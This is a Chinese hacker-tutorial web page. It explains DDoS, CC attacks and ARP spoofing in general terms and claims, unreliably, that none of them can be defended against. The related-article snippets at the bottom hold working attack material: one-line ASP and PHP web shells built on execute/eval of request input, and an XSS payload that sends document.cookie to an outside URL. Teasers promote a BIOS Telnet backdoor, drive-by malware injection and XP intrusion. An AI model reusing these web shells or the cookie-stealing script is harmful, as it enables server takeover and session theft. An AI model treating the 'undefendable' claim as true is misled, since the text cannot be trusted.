详解服务器三大攻击杀手(DDoS CC攻击 ARP欺骗)

所属分类: 网络安全 / 黑客教程 阅读数: 78
收藏 0 赞 0 分享

服务器方法有很多 如网站在同一时间受到大量的访问流量 超过网站服务器所能承受的限制 那么网站所解析的服务器就会崩溃。

主流的服务器攻击方式有多种手段,但是唯独DDoS攻击、CC攻击以及ARP欺骗,这些攻击方式被称为三大攻击手段,不仅可以致使服务器瘫痪,而且还很无解。

DDoS无情也无解

DDoS攻击全名叫做分布式拒绝服务(DDoS:Distributed Denial of Service),攻击者往往将多个计算机平台联合起来对同一个目标或者多个目标进行攻击,攻击所造成的后果也因此而严重程度不同。

DDoS攻击出现至今已将近三十年,可是至今依然未能出现有效的应对手段。今年里约奥运会期间,DDoS攻击再次大行其道。全球攻击峰值达到了今年的最高值,可见只是一种人来疯而且还不怕见光的攻击手段。

DDoS攻击无解无情

那么DDoS攻击为何如此无解呢?因为DDoS攻击常常会采用通过大量合法的请求的手段占用服务器网络资源,由此而达到瘫痪网络的目的。服务器在面对DDoS攻击时很难合理的判定和区分请求,因此遭受攻击时往往束手无策,只能等待攻击者停止攻击。

CC攻击(Challenge Collapsar)不逊色

CC攻击相比DDoS攻击也并不逊色。本质上来看,二者属于同一类攻击,均是要借助代理服务器生成指向受害主机的合法请求。但不同的是,DDoS攻击通常针对平台以及网站发送大量数据包造成目标瘫痪,而CC攻击则更倾向于攻击页面。

那么是否CC攻击要比DDoS攻击影响小呢?并非这样,CC攻击IP及流量,隐藏性都非常强,这种攻击手段是很多论坛用户常见的一种,是目前十分主流的一种服务器攻击方式。

ARP欺骗则和上述两种有着本质的区别

ARP(Address Resolution Protocol)欺骗通俗来讲便是将IP地址转化成物理地址的协议。其一般会有两种出现方式,一种为对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。

这两种欺骗都会引起十分严重的后果,对路由器的欺骗可能会导致相关网关数据被截获,黑客制造路由器错误的内网Mac地址,使得真实信息无法保存于路由器之中。而对PC的网关欺骗则是通过伪造网关,欺骗PC向假的网关发送数据。

而这三种攻击方式之所以会被认为是三大攻击方式的原因,只因为他们有一个共同点,那就是无法防御。

【编辑推荐】

全球近80万FTP服务器账号可被未授权访问如何发现“利用DNS放大攻击”的服务器九项实例技巧帮您保障Linux服务器安全使用Tamper Data登录zabbix服务器并实施安全检查玩出C&C服务器地址隐身的新花样,看看这个恶意软件怎么做的

推荐文章:

详解简单的反黑客远程控制的方法(后门程序)

2016年上半年DDoS攻击趋势分析 DDoS攻击规模和频率不断攀升

大揭秘:原来黑客是这么破解MCU的

更多精彩内容其他人还在看

一句话木马(asp,php) 总结篇

asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#" run
收藏 0 赞 0 分享

asp php XSS获取cookie的代码

<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</scr
收藏 0 赞 0 分享

冰河暗涌防不胜防 BIOS下实现的Telnet后门

该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技术目录 1、 实验环境,使用bochs调试工具。 2、 刷新BIOS技术问
收藏 0 赞 0 分享

网页挂马详细步骤教程

其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码插进网页中:
收藏 0 赞 0 分享

汇编揭开死循环的神秘面纱

i 首先请大家看这么一个简单的小程序: #include <stdio.h> void main() {     int i
收藏 0 赞 0 分享

用递归写Win32的文件夹遍历

文件夹遍历技术是一种非常有用的技术,在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。 文件夹遍历技术的核心就是使用递归算法,关于递归算法,我这里就不多介绍了,不明白的朋友请找出谭先生的《C程序设计》参阅相关内容。 以下是
收藏 0 赞 0 分享

“QQ反骚扰”开发手记

呆在家中上网聊天实在不是一件惬意的事:每一天打开QQ,迎接我的都是一串一串的广告……国庆黄金周,连广告也不放过!:( 无奈,打开Visual C++,开始了我的“反骚扰”之路。 首先我面对的问题是:QQ一共有几种广告,我能
收藏 0 赞 0 分享

让本地连接不再受限

  “本地连接”突然受限   单位局域网中有一台旧计算机,平时安装使用的是Windows XP系统,在该系统环境下该计算机可以正常访问网络;后来,某位同事为了能够在第一时间体验到Windows Vista系统的精彩,特意对该计算机系统进行了升级,不过升
收藏 0 赞 0 分享

SQL语句导入导出大全

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa&quo
收藏 0 赞 0 分享

黑客教你7招秘籍入侵xp系统

 第一招:屏幕保护   在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,
收藏 0 赞 0 分享
查看更多